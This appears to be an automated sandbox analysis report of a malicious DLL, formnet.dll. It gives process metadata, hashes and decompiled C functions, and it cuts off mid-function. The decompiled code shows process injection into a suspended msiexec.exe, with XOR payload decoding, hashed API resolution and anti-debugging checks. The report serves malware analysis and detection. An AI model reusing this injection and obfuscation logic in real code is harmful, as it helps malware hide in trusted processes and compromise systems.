Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xff1c0000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: rundll32.exe PID: 2484 Parent PID: 2480

General

Start time:	04:09:44
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	'C:\Windows\System32\rundll32.exe' C:\ProgramData\formnet.dll,DllRegisterServer
Imagebase:	0xb20000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: msiexec.exe PID: 2692 Parent PID: 2484

General

Start time:	04:10:11
Start date:	27/01/2021
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	msiexec.exe
Imagebase:	0x520000
File size:	73216 bytes
MD5 hash:	4315D6ECAE85024A0567DF2CB253B7B0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2484 Parent PID: 2480 rundll32.exeCOMMON

Executed Functions

Function 0097AE40, Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 372
injectionmemorythreadCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0097AE40(void* __eflags) {
				void* _v20;
				void* _v24;
				long _v28;
				intOrPtr _v32;
				long _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				struct _PROCESS_INFORMATION _v68;
				void* _v72;
				intOrPtr _v110;
				char _v111;
				char _v125;
				signed int _v129;
				char _v130;
				void* _v134;
				char _v135;
				intOrPtr _v139;
				void _v140;
				char _v155;
				char _v179;
				void* _v712;
				char _v896;
				char _v1416;
				void* __ebx;
				void* __edi;
				void* _t76;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t94;
				int _t97;
				void* _t100;
				void* _t104;
				signed int _t107;
				int _t109;
				void* _t111;
				void _t112;
				void* _t119;
				int _t121;
				intOrPtr* _t123;
				int _t126;
				long _t128;
				int _t129;
				int _t136;
				void* _t137;
				signed int _t139;
				signed int _t148;
				void* _t150;
				struct _STARTUPINFOA* _t151;
				long _t152;
				void* _t153;
				CONTEXT* _t155;
				signed int _t157;
				void* _t159;
				signed int _t172;
				void* _t177;
				CHAR* _t178;
				long _t180;
				intOrPtr _t182;
				void* _t184;
				signed int _t185;
				void* _t196;
				void* _t207;
				signed int _t241;

				_t226 = __eflags;
				E009745B0(_t76, _t159, _t177, __eflags); // executed
				E00976C20(_t159, _t177, __eflags);
				E00976530(_t159, _t177, _t226);
				E00978660(_t159, _t177, _t226);
				E009778D0(_t159, _t177, _t226);
				E009766E0(_t159, _t177, _t226);
				_t188 = 0xffffffff;
				if(E0097D670() == 0) {
					return 0xffffffff;
				}
				E0098B180();
				_t228 =  *0x9937b0;
				if( *0x9937b0 == 0) {
					L19:
					E0097BF50(_t243, 0, E00979D50(0x638d6cbf));
					ExitProcess(0);
				}
				_t89 = E0097BF50(_t228, 0, E00979D50(0x6bae8bdb));
				_t196 = _t196 + 0xc;
				_t188 =  &_v1416;
				 *_t89( *0x9937b0,  &_v1416, 0x104);
				_t91 =  *0x9937b0; // 0x970000
				_t229 = _t91;
				_v32 = _t91;
				if(_t91 == 0) {
					goto L19;
				}
				_t151 =  &_v140;
				E00988F20(_t151, 0x44);
				_v140 = 0x44;
				_t94 = E0097D0A0( &_v179, 0x990b1b,  &_v179);
				_t178 =  &_v896;
				E0097C560(_t178, _t94, 0xffffffff);
				E0097BF50(_t229, 0, 0x1e16041);
				_t196 = _t196 + 0x24;
				_t97 = CreateProcessA(0, _t178, 0, 0, 0, 4, 0, 0, _t151,  &_v68); // executed
				_t230 = _t97 - 1;
				if(_t97 != 1) {
					goto L19;
				}
				_t152 = E0097A820(_v32);
				E0097BF50(_t230, 0, 0x8cae838);
				_t196 = _t196 + 0xc;
				_t100 = VirtualAllocEx(_v68.hProcess, 0, _t152, 0x3000, 4); // executed
				_t231 = _t100;
				if(_t100 == 0) {
					goto L19;
				}
				 *0x992ca8 = _t100;
				_v24 = _t100;
				E0098FA60(_t178, _t231,  &_v1416);
				E009890E0(_t178);
				E0098FB20(_t178);
				_t104 = E00979D80(_v32, _t152); // executed
				_t188 = _t104;
				E00984660(_t104, _v32);
				E00979550(_t152, _t177, _v32, _t231, _t188, _v24);
				_t207 = _t196 + 0x1c;
				_t107 = E009876C0(_t231);
				_t180 = _t152;
				_v48 = _t107;
				if(_t152 == 0) {
					L8:
					_v28 = 0;
					E0097BF50(_t234, 0, 0xa48b0f9);
					_t196 = _t207 + 8;
					_t109 = WriteProcessMemory(_v68.hProcess, _v24, _t188, _t180,  &_v28); // executed
					_t235 = _t109 - 1;
					if(_t109 == 1) {
						_t188 = _t180;
						E0097BF50(_t235, 0, 0x8cae838);
						_t196 = _t196 + 8;
						_t111 = VirtualAllocEx(_v68.hProcess, 0, 0x42, 0x3000, 4); // executed
						_t236 = _t111;
						if(_t111 != 0) {
							_t112 = E00977DD0(0x12);
							_t153 = _v24;
							_v140 = _t112;
							_v20 = _t111;
							_v139 = _t153;
							_v135 = E00977DD0(0x15);
							_v134 = _t188;
							_v130 = 0xb8;
							_v129 = _v48;
							E0097E930( &_v125, E0098D7E0( &_v28, _t177, 0x990962, 0xf,  &_v155), 0xe);
							_t182 = _v32;
							_v111 = 0xe9;
							E009722E0(_t236, E0097CA4E, _t182);
							_t119 = E00979D50(0x2e6222c1);
							_t184 = _v20;
							_v110 = 0xb681a7e1 - _t182 + _t153 - _t184 + _t119;
							E0097BF50(_t236, 0, 0xa48b0f9);
							_t196 = _t196 + 0x34;
							_t121 = WriteProcessMemory(_v68.hProcess, _t184,  &_v140, 0x42,  &_v28); // executed
							_t237 = _t121 - 1;
							if(_t121 == 1) {
								_v36 = _t188;
								_t155 =  &_v896;
								E00988F20(_t155, 0x2cc);
								_v896 = 0x10001;
								_t123 = E0097BF50(_t237, 0, 0x4bbc7e4);
								_t188 =  *_t123(_v68.hThread, _t155);
								E0097BF50(_t237, 0, 0xd1a4de8);
								_t196 = _t196 + 0x18;
								_t126 = VirtualProtectEx(_v68.hProcess, _t184, 0x42, 0x10,  &_v28); // executed
								if(_t126 == 1) {
									_t239 = _t188 - 1;
									_t172 = 1;
									_v712 = _t184;
									if(_t188 == 1) {
										E0097BF50(_t239, 0, E00979D50(0x60ce8748));
										_t196 = _t196 + 0xc;
										_t136 = SetThreadContext(_v68.hThread, _t155); // executed
										_t68 = _t136 != 1;
										_t241 = _t68;
										_t172 = 0 | _t68;
									}
									_t185 = _t172;
									_t188 = E0097BF50(_t241, 0, 0xd1a4de8);
									_t128 = E00979D50(0x647400ec);
									_t196 = _t196 + 0xc;
									_t129 = VirtualProtectEx(_v68.hProcess, _v24, _v36, _t128,  &_v28); // executed
									if(_t129 == 1) {
										_t243 = _t185;
										if(_t185 == 0) {
											E0097BF50(__eflags, 0, E00979D50(0x6f5727e8));
											_t196 = _t196 + 0xc;
											_push(_v68.hThread);
										} else {
											E0097BF50(_t243, 0, 0x68b1574);
											_t196 = _t196 + 8;
											_push(0);
											_push(0);
											_push(0);
											_push(_v20);
											_push(0);
											_push(0);
											_push(_v68);
										}
										ResumeThread(); // executed
									}
								}
							}
						}
					}
					goto L19;
				} else {
					_t157 = _v48;
					_t137 = 0;
					_v36 = _t180;
					_v72 = _t188;
					do {
						_v20 = _t137;
						 *(_t188 + _t137) =  *(_t188 + _t137) ^ _t157;
						_t139 = _t157 << 8;
						_v52 = _t139;
						_v44 =  !_t139;
						_v40 = E00973750(0,  !_t139, 0x9b6b004f);
						_v40 = E00972DC0(0, E00979D50(0xff1f00e3) &  !(_t157 >> 0x18), _t157 >> 0x00000018 & 0xffffffb0) ^ (_v52 & 0x6494ff00 | _v40);
						_t180 = _v36;
						_v44 = E009720A0(0, E00972DC0(0, _v44,  !(_t157 >> 0x18)), 0xffffffff);
						_t148 = E00979D50(0xff1f00e3);
						E00972DC0(0, _v52, _t157 >> 0x18);
						_t150 = E009722E0(0, 0, 1);
						_t207 = _t207 + 0x38;
						_v20 = _v20 - _t150;
						_t157 = (_t148 | 0x6494ffb0) & _v44 | _v40;
						_t188 = _v72;
						_t137 = _v20;
						_t234 = _t137 - _t180;
					} while (_t137 != _t180);
					goto L8;
				}
			}

0x0097ae40
0x0097ae4c
0x0097ae51
0x0097ae56
0x0097ae5b
0x0097ae60
0x0097ae65
0x0097ae6a
0x0097ae76
0x0097b2de
0x0097b2de
0x0097ae7c
0x0097ae81
0x0097ae88
0x0097b2b4
0x0097b2c4
0x0097b2ce
0x0097b2ce
0x0097ae9e
0x0097aea3
0x0097aea6
0x0097aeb8
0x0097aeba
0x0097aebf
0x0097aec1
0x0097aec4
0x00000000
0x00000000
0x0097aeca
0x0097aed3
0x0097aee1
0x0097aef1
0x0097aef9
0x0097af03
0x0097af12
0x0097af17
0x0097af2e
0x0097af30
0x0097af33
0x00000000
0x00000000
0x0097af44
0x0097af4d
0x0097af52
0x0097af62
0x0097af64
0x0097af66
0x00000000
0x00000000
0x0097af6c
0x0097af74
0x0097af77
0x0097af7d
0x0097af87
0x0097af91
0x0097af99
0x0097af9d
0x0097afa9
0x0097afae
0x0097afb1
0x0097afb8
0x0097afba
0x0097afbd
0x0097b08d
0x0097b08d
0x0097b09b
0x0097b0a0
0x0097b0af
0x0097b0b1
0x0097b0b4
0x0097b0ba
0x0097b0c3
0x0097b0c8
0x0097b0d9
0x0097b0db
0x0097b0dd
0x0097b0e7
0x0097b0ef
0x0097b0f2
0x0097b0f8
0x0097b0fb
0x0097b10b
0x0097b114
0x0097b11a
0x0097b11e
0x0097b13e
0x0097b146
0x0097b149
0x0097b153
0x0097b160
0x0097b176
0x0097b17d
0x0097b187
0x0097b18c
0x0097b19d
0x0097b19f
0x0097b1a2
0x0097b1a8
0x0097b1b0
0x0097b1b7
0x0097b1bf
0x0097b1d0
0x0097b1de
0x0097b1e7
0x0097b1ec
0x0097b1fb
0x0097b200
0x0097b206
0x0097b209
0x0097b20e
0x0097b214
0x0097b226
0x0097b22b
0x0097b232
0x0097b239
0x0097b239
0x0097b239
0x0097b239
0x0097b23c
0x0097b250
0x0097b257
0x0097b25c
0x0097b26b
0x0097b270
0x0097b272
0x0097b274
0x0097b2a7
0x0097b2ac
0x0097b2af
0x0097b276
0x0097b27d
0x0097b282
0x0097b285
0x0097b287
0x0097b289
0x0097b28b
0x0097b28e
0x0097b290
0x0097b292
0x0097b292
0x0097b2b2
0x0097b2b2
0x0097b270
0x0097b200
0x0097b1a2
0x0097b0dd
0x00000000
0x0097afc3
0x0097afc3
0x0097afc6
0x0097afc8
0x0097afcb
0x0097afd0
0x0097afd0
0x0097afd3
0x0097afdd
0x0097afe0
0x0097afe7
0x0097affb
0x0097b027
0x0097b02b
0x0097b044
0x0097b04c
0x0097b066
0x0097b072
0x0097b077
0x0097b07a
0x0097b07d
0x0097b07f
0x0097b082
0x0097b085
0x0097b085
0x00000000
0x0097afd0

APIs

VirtualAllocEx.KERNELBASE(?,00000000,00000000,00003000,00000004), ref: 0097AF62
WriteProcessMemory.KERNELBASE(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?), ref: 0097B0AF
VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0097B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 0097B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 0097B1FB
SetThreadContext.KERNEL32(?,?), ref: 0097B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 0097B26B
ResumeThread.KERNELBASE(?), ref: 0097B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0097AF2E

Part of subcall function 0097BF50: LoadLibraryA.KERNEL32(?), ref: 0097C1A1

ExitProcess.KERNEL32(00000000), ref: 0097B2CE

Strings

D, xrefs: 0097AEE1

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: 91d81265d6a6774802ad225f7f27c67fae49e0701cf016d1850cc77b5abc4090
Instruction ID: 2078e032f6b8b78f3789c7eb8af30da6e5d670ba13dec6476fcf1adf4411fed3
Opcode Fuzzy Hash: 91d81265d6a6774802ad225f7f27c67fae49e0701cf016d1850cc77b5abc4090
Instruction Fuzzy Hash: A8C1AAB7D402146BEF10ABE49C53FAE7678AF94715F144024F91CB62C2FA616E148BB2

Uniqueness

Uniqueness Score: -1.00%

Function 00A50D28, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000920,00003000,00000040,00000920,00A50780), ref: 00A50DE5
VirtualAlloc.KERNEL32(00000000,000005EB,00003000,00000040,00A507E1), ref: 00A50E1C
VirtualAlloc.KERNEL32(00000000,00022439,00003000,00000040), ref: 00A50E7C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A50EB2
VirtualProtect.KERNEL32(00970000,00000000,00000004,00A50D07), ref: 00A50FB7
VirtualProtect.KERNEL32(00970000,00001000,00000004,00A50D07), ref: 00A50FDE
VirtualProtect.KERNEL32(00000000,?,00000002,00A50D07), ref: 00A510AB
VirtualProtect.KERNEL32(00000000,?,00000002,00A50D07,?), ref: 00A51101
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A5111D

Memory Dump Source

Source File: 00000003.00000002.2154606715.0000000000A50000.00000040.00020000.sdmp, Offset: 00A50000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction ID: 2be355e86e1ec837ed65fb551e1989fc533e1327a78c57f5a59fdd594d9f10f2
Opcode Fuzzy Hash: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction Fuzzy Hash: A3D14A725002809FEB15CF54C881F6A77AAFFC8310B294198ED899F35EDB70B854CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0098DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0098DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00977200(0x9905f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x0098da3f
0x0098da47
0x0098da4c
0x0098da53
0x0098da53
0x0098da5b
0x0098da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00991D33,?,009791EB,-00991D33,?,009777A1,00000001), ref: 0098DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00991D33,?,009791EB,-00991D33,?,009777A1,00000001,?,-00991D33,?,00976A74), ref: 0098DA4C
CloseHandle.KERNEL32(00000000), ref: 0098DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00991D33,?,009791EB,-00991D33,?,009777A1,00000001,?,-00991D33,?,00976A74), ref: 0098DA5B

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 52a8916a3642f9f0462a6fc63b58be1ec33be439920eebe346a579b6d494f74d
Instruction ID: 9ccb241bf0e4b1f265baf72d6449f95297e0ba152c16bb42531cc186fdf0e720
Opcode Fuzzy Hash: 52a8916a3642f9f0462a6fc63b58be1ec33be439920eebe346a579b6d494f74d
Instruction Fuzzy Hash: D0E048726582046FE61037ED6C0BF7A362C9F84746F450051FB2DE91C1E5555454C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 00A3914E, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00A36F5C,00000001), ref: 00A3915F
HeapDestroy.KERNEL32 ref: 00A39195

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: 6da5f6cee98d3b34330bcc5afe4cebf639a745142605a35d43baada40f5ac58e
Instruction ID: f912ff52255b898d56fe466e936cc1a8a41bb3bb58a6ea122eed504e3f175d58
Opcode Fuzzy Hash: 6da5f6cee98d3b34330bcc5afe4cebf639a745142605a35d43baada40f5ac58e
Instruction Fuzzy Hash: ADE09B756A4302AEEB90DBF0AC0972B35B4E794787F104435F501D50A0F7F1C5417A04

Uniqueness

Uniqueness Score: -1.00%

Function 0098D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0098D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E00977200(0x9905f8,  &_v22)); // executed
				return GetCapture();
			}

0x0098d776
0x0098d78e
0x0098d798

APIs

GetConsoleCP.KERNEL32 ref: 0098D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,0097AE51), ref: 0098D78E

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: 063afb901e3efd12cb2b882c71283352910dbb209cc0b7952059d2c47b4283a2
Instruction ID: f06fc966d8ede5a0e54fb859ebec94dec0c04bf7fd68337521b1f983606079f1
Opcode Fuzzy Hash: 063afb901e3efd12cb2b882c71283352910dbb209cc0b7952059d2c47b4283a2
Instruction Fuzzy Hash: E0D0C7B28581099FC64037AD6C0FA2A776C5984206B450061FD3955112F5295558D7B6

Uniqueness

Uniqueness Score: -1.00%

Function 0098B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0098B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E00979D50(0xfef6f706);
				E0097BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x992124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x0098b1b4
0x0098b1b7
0x0098b1b9
0x0098b1eb
0x00000000
0x0098b1eb
0x0098b1c0
0x0098b1d6
0x0098b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 0098B1E7

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 78b1f6f4553a7b6b395a2cdb9f28ed35baa9357f35726e7d0f96121f53dd2d88
Instruction ID: e88bb0be3a864022d356c2e8d2bfff41361d0015ff21c9f460108635fa68c450
Opcode Fuzzy Hash: 78b1f6f4553a7b6b395a2cdb9f28ed35baa9357f35726e7d0f96121f53dd2d88
Instruction Fuzzy Hash: E5E0C233A482287BC62137D4AC26F977B988F05B65F190420FE0DAB251E641BA1487E5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009869A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009869A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00979D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E009755C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E009755C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x009869b2
0x009869c1
0x009869ca
0x009869d9
0x009869de
0x009869e3
0x00986a25
0x00986a25
0x009869eb
0x009869eb
0x009869ef
0x009869f0
0x009869ff
0x00986a04
0x00986a11
0x00986a1d
0x00986a21
0x00000000
0x00000000
0x00986a23
0x00986a21
0x00000000
0x00986a1d
0x00000000
0x009869f0
0x00986a27
0x00986a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009869AD
GetCurrentProcessId.KERNEL32 ref: 009869C4
Thread32First.KERNEL32(00000000,?), ref: 009869D1
GetLastError.KERNEL32 ref: 009869F0
Thread32Next.KERNEL32(00000000,?), ref: 00986A16

Memory Dump Source

Source File: 00000003.00000002.2154499347.0000000000971000.00000020.00020000.sdmp, Offset: 00970000, based on PE: true

Associated: 00000003.00000002.2154494949.0000000000970000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154515642.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.2154520064.0000000000992000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.2154524821.0000000000995000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 4be55a95bc5a6fcb52aa0c125ea51827a7015cc270b6508e704382c88fc3d539
Instruction ID: b8c1a790f021ee39283168bacfa8de95163d382ee1123d9058947f1a4637888a
Opcode Fuzzy Hash: 4be55a95bc5a6fcb52aa0c125ea51827a7015cc270b6508e704382c88fc3d539
Instruction Fuzzy Hash: EC01F2739503046BDB107BA4AD86FEF3A6CEF81314F484031FA05BA353F919890483B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A3ABA4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00A3ED8D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00A3EDA2
UnhandledExceptionFilter.KERNEL32(00A4DBB4), ref: 00A3EDAD
GetCurrentProcess.KERNEL32(C0000409), ref: 00A3EDC9
TerminateProcess.KERNEL32(00000000), ref: 00A3EDD0

Memory Dump Source

Source File: 00000003.00000002.2154529687.0000000000996000.00000020.00020000.sdmp, Offset: 00996000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: fee680da1a27a30d08ea8294cdb1e1853deba0bcc6cceb3665b9666ecb7d7a00
Instruction ID: 9eebd134c922e9507188940c8a2cbff3dce7afe69c10e7072446777e6bb53a87
Opcode Fuzzy Hash: fee680da1a27a30d08ea8294cdb1e1853deba0bcc6cceb3665b9666ecb7d7a00
Instruction Fuzzy Hash: FA21D2B8C11708EFC710DFE8F9456483BB0BB5D705F42511AEA0987261E7F19A839F95

Uniqueness

Uniqueness Score: -1.00%

Function 0097D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0097D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E009812D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00979D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00979D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00971460(_t205, E00971460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00971460(0,  ~( *_t143), _v40));
							E00971460(0,  *_t143, _a4);
							E00988F20( &_v140, E00979D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E0098D680(0, _t91);
									_t176 = _t176 - E009722E0(0, 0, 1);
									E00971460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E009800A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00971460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00979D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E009722E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00971460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00977DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00971460(__eflags, E009722E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00971460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00971460(__eflags, _t137, E00979D50(0x3638cbc4));
										E00971460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00977DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
